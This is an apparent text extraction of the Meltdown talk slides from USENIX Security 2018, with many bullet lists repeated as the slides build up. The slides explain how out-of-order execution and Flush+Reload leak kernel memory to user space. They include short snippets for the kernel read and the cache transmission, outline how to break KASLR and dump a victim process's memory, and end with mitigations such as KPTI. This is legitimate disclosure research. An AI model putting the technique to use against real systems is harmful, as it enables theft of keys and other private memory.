# Meltdown

Reading Kernel Memory from User Space

# Moritz Lipp<sup>1</sup>, Michael Schwarz<sup>1</sup>, Daniel Gruss<sup>1</sup>, Thomas Prescher<sup>2</sup>, Werner Haas<sup>2</sup>, Anders Fogh<sup>3</sup>, Jann Horn<sup>4</sup>, Stefan Mangard<sup>1</sup>, Paul Kocher<sup>5</sup>, Daniel Genkin<sup>6</sup>, Yuval Yarom<sup>7</sup>, Mike Hamburg<sup>8</sup>

27th USENIX Security Symposium - August 16, 2018

<sup>1</sup>Graz University of Technology, <sup>2</sup>Cyberus Technology GmbH, <sup>3</sup>G-Data Advanced Analytics, <sup>4</sup>Google Project Zero, <sup>5</sup>Independent (www.paulkocher.com), <sup>6</sup>University of Michigan, <sup>7</sup>University of Adelaide & Data61, <sup>8</sup>Rambus, Cryptography Research Division









• Find something human readable, e.g., the Linux version





```
char data = *(char*) 0xfffffff81a000e0;
printf("%c\n", data);
```





```
char data = *(char*) 0xfffffff81a000e0;
printf("%c\n", data);
```

- Any invalid access throws an exception  $\rightarrow \ensuremath{\textit{segmentation}}$  fault





• Kernel is isolated from user space





- Kernel is isolated from user space
- This isolation is a combination of hardware and software





- Kernel is isolated from user space
- This isolation is a combination of hardware and software
- User applications cannot access anything from the kernel





• CPU support virtual address spaces to isolate processes





- CPU support virtual address spaces to isolate processes
- Physical memory is organized in page frames





- CPU support virtual address spaces to isolate processes
- Physical memory is organized in page frames
- Virtual memory pages are mapped to page frames using page tables

#### Address Translation on x86-64





M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, M. Hamburg

#### Address Translation on x86-64





M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, M. Hamburg





• User/Supervisor bit defines in which privilege level the page can be accessed





• Kernel is typically mapped into every address space





- Kernel is typically mapped into every address space
- Entire physical memory is mapped in the kernel



```
char data = *(char*) 0xfffffff81a000e0;
printf("%c\n", data);
```

- We try to load an inaccessible address
- Permission is checked





• Instruction Set Architecture (ISA) is an abstract model of a computer (x86, ARMv8, SPARC, ...)

# Architecture and Microarchitecture





- Instruction Set Architecture (ISA) is an abstract model of a computer (x86, ARMv8, SPARC, ...)
- Serves as the interface between hardware and software

## Architecture and Microarchitecture





- Instruction Set Architecture (ISA) is an abstract model of a computer (x86, ARMv8, SPARC, ...)
- Serves as the interface between hardware and software
- Microarchitecture is an actual implementation of the ISA

## **Architecture and Microarchitecture**





- Instruction Set Architecture (ISA) is an abstract model of a computer (x86, ARMv8, SPARC, ...)
- Serves as the interface between hardware and software
- Microarchitecture is an actual implementation of the ISA





· Safe software infrastructure does not mean safe execution





- · Safe software infrastructure does not mean safe execution
- Information leaks because of the underlying hardware



## Side-channel Attacks



- · Safe software infrastructure does not mean safe execution
- Information leaks because of the underlying hardware
- Exploit unintentional information leakage by side-effects



## Side-channel Attacks



- · Safe software infrastructure does not mean safe execution
- Information leaks because of the underlying hardware
- Exploit unintentional information leakage by side-effects





printf("%d", i); printf("%d", i);





































#### **Memory Access Latency**





M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, M. Hamburg

Flush+Reload





Flush+Reload




























M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, M. Hamburg





#### Instructions are

fetched and decoded in the front-end





### Instructions are

- fetched and decoded in the front-end
- dispatched to the backend





### Instructions are

- fetched and decoded in the front-end
- dispatched to the backend
- processed by individual execution units





### Instructions

are executed out-of-order





- are executed out-of-order
- wait until their dependencies are ready





- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute prior earlier instructions





- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute prior earlier instructions
- retire in-order





- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute prior earlier instructions
- retire in-order
  - State becomes architecturally visible





- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute prior earlier instructions
- retire in-order
  - State becomes architecturally visible
- Exceptions are checked during retirement





- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute prior earlier instructions
- retire in-order
  - State becomes architecturally visible
- Exceptions are checked during retirement
  - Flush pipeline and recover state





\*(volatile char\*) 0; // raise\_exception();
array[84 \* 4096] = 0;





• Flush+Reload over all pages of the array







• Flush+Reload over all pages of the array



• "Unreachable" code line was actually executed





• Flush+Reload over all pages of the array



- "Unreachable" code line was actually executed
- Exception was only thrown afterwards





Out-of-order instructions leave microarchitectural traces





- Out-of-order instructions leave microarchitectural traces
  - We can see them for example in the cache





- Out-of-order instructions leave microarchitectural traces
  - We can see them for example in the cache
- Give such instructions a name: transient instructions





- Out-of-order instructions leave microarchitectural traces
  - We can see them for example in the cache
- Give such instructions a name: transient instructions
- We can indirectly observe the execution of transient instructions

# **Building blocks**





M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, M. Hamburg



• Transient instructions are executed all the time



- Transient instructions are executed all the time
- Loading inaccessible addresses leads to a crash (segfault)

# **Executing transient instructions**



- Transient instructions are executed all the time
- Loading inaccessible addresses leads to a crash (segfault)
- How to prevent the crash?

# **Executing transient instructions**



- Transient instructions are executed all the time
- Loading inaccessible addresses leads to a crash (segfault)
- How to prevent the crash?





שי ה

- Transfer of the microarchitectural state into an architectural state
- Transient instruction sequence is the sender
- Receiver receives the microarchitectural state change and deduces the secret from the state





- Leverage techniques from cache attacks: Flush+Reload
  - Transmit multiple bits at once
    - + 256 different byte values  $\Rightarrow$  access different cache line
  - Not limited to the cache





• Add another layer of indirection to test

char data = \*(char\*) 0xfffffff81a000e0; array[data \* 4096] = 0;





• Add another layer of indirection to test

```
char data = *(char*) 0xfffffff81a000e0;
array[data * 4096] = 0;
```

• Then check whether any part of array is cached





• Flush+Reload over all pages of the array



• Index of cache hit reveals data





• Flush+Reload over all pages of the array



- Index of cache hit reveals data
- Permission check is in some cases not fast enough






• Using out-of-order execution, we can read data at any address





- Using out-of-order execution, we can read data at any address
- Index of cache hit reveals data





- Using out-of-order execution, we can read data at any address
- Index of cache hit reveals data
- Permission check is in some cases not fast enough





- Using out-of-order execution, we can read data at any address
- Index of cache hit reveals data
- Permission check is in some cases not fast enough
- Entire physical memory is typically accessible through kernel space

# Demo





 Assumed that one can only read data stored in the L1 with Meltdown





- Assumed that one can only read data stored in the L1 with Meltdown
- Experiment where a thread flushes the value constantly and a thread on a different core reloads the value





- Assumed that one can only read data stored in the L1 with Meltdown
- Experiment where a thread flushes the value constantly and a thread on a different core reloads the value
  - Target data is not in the L1 cache of the attacking core





- Assumed that one can only read data stored in the L1 with Meltdown
- Experiment where a thread flushes the value constantly and a thread on a different core reloads the value
  - Target data is not in the L1 cache of the attacking core
- We can still leak the data at a lower reading rate





- Assumed that one can only read data stored in the L1 with Meltdown
- Experiment where a thread flushes the value constantly and a thread on a different core reloads the value
  - Target data is not in the L1 cache of the attacking core
- We can still leak the data at a lower reading rate
- Meltdown might implicitly cache the data



# • Mark pages in page tables as UC (uncachable)





# • Mark pages in page tables as UC (uncachable)

• Every read or write operation will go to main memory





| ן החחחחח |
|----------|
|          |
|          |
|          |

- Mark pages in page tables as UC (uncachable)
  - Every read or write operation will go to main memory
- If the attacker can trigger a legitimate load (system call, ...) on the same CPU core, the data still can be leaked



| ח | חח  | חח           | Шſ  |
|---|-----|--------------|-----|
| ח | ດ ດ | חח           | ה ן |
|   |     | با با<br>سنس |     |

- Mark pages in page tables as UC (uncachable)
  - Every read or write operation will go to main memory
- If the attacker can trigger a legitimate load (system call, ...) on the same CPU core, the data still can be leaked
- Meltdown might read the data from one of the fill buffers



| ח | חח  | חח           | Шſ  |
|---|-----|--------------|-----|
| ח | ດ ດ | חח           | ה ן |
|   |     | با با<br>سنس |     |

- Mark pages in page tables as UC (uncachable)
  - Every read or write operation will go to main memory
- If the attacker can trigger a legitimate load (system call, ...) on the same CPU core, the data still can be leaked
- Meltdown might read the data from one of the fill buffers
  - as they are shared between threads running on the same core





• Intel: Almost every CPU







|           |          | <u> </u> |
|-----------|----------|----------|
| ⊢         | <u> </u> | Δ        |
| <b></b> . |          | lox      |
| <b></b> . |          |          |
| •••       |          | J        |
| •••       |          |          |

- Intel: Almost every CPU
- AMD: Seems not to be affected





|     |       | Ē  |
|-----|-------|----|
|     |       | Δ  |
|     | 11111 | ox |
| ••• | 11111 | Ŀ  |
| ••• | 11111 |    |

- Intel: Almost every CPU
- AMD: Seems not to be affected
- ARM: Only the Cortex-A75





|          |       | <b>—</b> |
|----------|-------|----------|
| <b>—</b> |       | Δ        |
| H.       |       | ox       |
| <b>—</b> | 11111 | Ŀ        |
| •••      | 11111 |          |

- Intel: Almost every CPU
- AMD: Seems not to be affected
- ARM: Only the Cortex-A75
- IBM: System Z, Power Architecture, POWER8 and POWER9





|          | -        |  |
|----------|----------|--|
| —        |          |  |
| <b>–</b> | <br>llox |  |
| <b></b>  |          |  |
|          |          |  |
| •••      |          |  |

- Intel: Almost every CPU
- AMD: Seems not to be affected
- ARM: Only the Cortex-A75
- IBM: System Z, Power Architecture, POWER8 and POWER9
- Apple: All Mac and iOS devices





#### Samsung Galaxy S7

• Exynos Mongoose M1 CPU Architecture





- Exynos Mongoose M1 CPU Architecture
  - Custom CPU core in the Exynos 8 Octa (8890)





- Exynos Mongoose M1 CPU Architecture
  - Custom CPU core in the Exynos 8 Octa (8890)
  - Perceptron Branch Prediction





- Exynos Mongoose M1 CPU Architecture
  - Custom CPU core in the Exynos 8 Octa (8890)
  - Perceptron Branch Prediction
  - Full Out-of-Order Instruction Execution





- Exynos Mongoose M1 CPU Architecture
  - Custom CPU core in the Exynos 8 Octa (8890)
  - Perceptron Branch Prediction
  - Full Out-of-Order Instruction Execution
    - Full Out-of-Order loads and stores





• Dumping the entire physical memory takes some time





- Dumping the entire physical memory takes some time
  - L1: 582 KB/s
  - L3: 12.4 KB/s
  - Uncached: 10 B/s (improved: 3.2 KB/s)
- Not very practical in most scenarios





- Dumping the entire physical memory takes some time
  - L1: 582 KB/s
  - L3: 12.4 KB/s
  - Uncached: 10 B/s (improved: 3.2 KB/s)
- Not very practical in most scenarios



### • De-randomize KASLR to access internal kernel structures





- De-randomize KASLR to access internal kernel structures
- Locate a known value inside the kernel, e.g., Linux banner



# **Breaking KASLR**



- De-randomize KASLR to access internal kernel structures
- Locate a known value inside the kernel, e.g., Linux banner
  - Start at the default address according to the symbol table of the running kernel



# **Breaking KASLR**



- De-randomize KASLR to access internal kernel structures
- Locate a known value inside the kernel, e.g., Linux banner
  - Start at the default address according to the symbol table of the running kernel
  - Linux KASLR has an entropy of 6 bits  $\Rightarrow$  only 64 possible randomization offsets



# **Breaking KASLR**



- De-randomize KASLR to access internal kernel structures
- Locate a known value inside the kernel, e.g., Linux banner
  - Start at the default address according to the symbol table of the running kernel
  - Linux KASLR has an entropy of 6 bits  $\Rightarrow$  only 64 possible randomization offsets
- Difference between the found address and the non-randomized base address is the randomization offset





• Linux manages all processes in a linked list







- Linux manages all processes in a linked list
- Head of the list is stored at init\_task structure

# Locating the victim process





- Linux manages all processes in a linked list
- Head of the list is stored at init\_task structure
  - At a fixed offset that varies only among kernel builds
### Locating the victim process





- Linux manages all processes in a linked list
- Head of the list is stored at init\_task structure
  - At a fixed offset that varies only among kernel builds
- Each task list structure contains a pointer to the next task and
  - PID of the task
  - name of the task
  - Root of the multi-level page table





• Resolve physical address using paging structures





- Resolve physical address using paging structures
- Read the content using the direct-physical map





- Resolve physical address using paging structures
- Read the content using the direct-physical map
- Enumerate all mapped pages and dump entire process memory





- Resolve physical address using paging structures
- Read the content using the direct-physical map
- Enumerate all mapped pages and dump entire process memory
- Location of the key known, we can just dump the key directly



• Problem is rooted in hardware







- Problem is rooted in hardware
- Race condition between the memory fetch and corresponding permission check
  - Serialize both of them





- Problem is rooted in hardware
- Race condition between the memory fetch and corresponding permission check
  - Serialize both of them
- Hard split of user space and kernel space
  - New bit in control register





- Problem is rooted in hardware
- Race condition between the memory fetch and corresponding permission check
  - Serialize both of them
- Hard split of user space and kernel space
  - New bit in control register
- + Fix the hardware  $\rightarrow$  long-term solution





- Problem is rooted in hardware
- Race condition between the memory fetch and corresponding permission check
  - Serialize both of them
- Hard split of user space and kernel space
  - New bit in control register
- + Fix the hardware  $\rightarrow$  long-term solution
- Can we fix it in software?

**KAISER** 





**KAISER** 









#### • KAISER [Gru+17] has been published in May 2017 ...





- KAISER [Gru+17] has been published in May 2017 ...
- ...as a countermeasure against other side-channel attacks





- KAISER [Gru+17] has been published in May 2017 ...
- ...as a countermeasure against other side-channel attacks
- Inadvertently defeats Meltdown as well





• Linux: Kernel Page-table Isolation (KPTI)





- Linux: Kernel Page-table Isolation (KPTI)
- Apple: Released updates





- Linux: Kernel Page-table Isolation (KPTI)
- Apple: Released updates
- Windows: Kernel Virtual Address (KVA) Shadow





## You can find our proof-of-concept implementation on:

• https://github.com/IAIK/meltdown

#### Conclusion





- Underestimated microarchitectural attacks for a long time
- Meltdown allows to read arbitrary kernel memory from user space
- Affecting millions of devices of various CPU manufacturers
- Countermeasures come with a performance impact

# Meltdown

Reading Kernel Memory from User Space

# Moritz Lipp<sup>1</sup>, Michael Schwarz<sup>1</sup>, Daniel Gruss<sup>1</sup>, Thomas Prescher<sup>2</sup>, Werner Haas<sup>2</sup>, Anders Fogh<sup>3</sup>, Jann Horn<sup>4</sup>, Stefan Mangard<sup>1</sup>, Paul Kocher<sup>5</sup>, Daniel Genkin<sup>6</sup>, Yuval Yarom<sup>7</sup>, Mike Hamburg<sup>8</sup>

27th USENIX Security Symposium - August 16, 2018

<sup>1</sup>Graz University of Technology, <sup>2</sup>Cyberus Technology GmbH, <sup>3</sup>G-Data Advanced Analytics, <sup>4</sup>Google Project Zero, <sup>5</sup>Independent (www.paulkocher.com), <sup>6</sup>University of Michigan, <sup>7</sup>University of Adelaide & Data61, <sup>8</sup>Rambus, Cryptography Research Division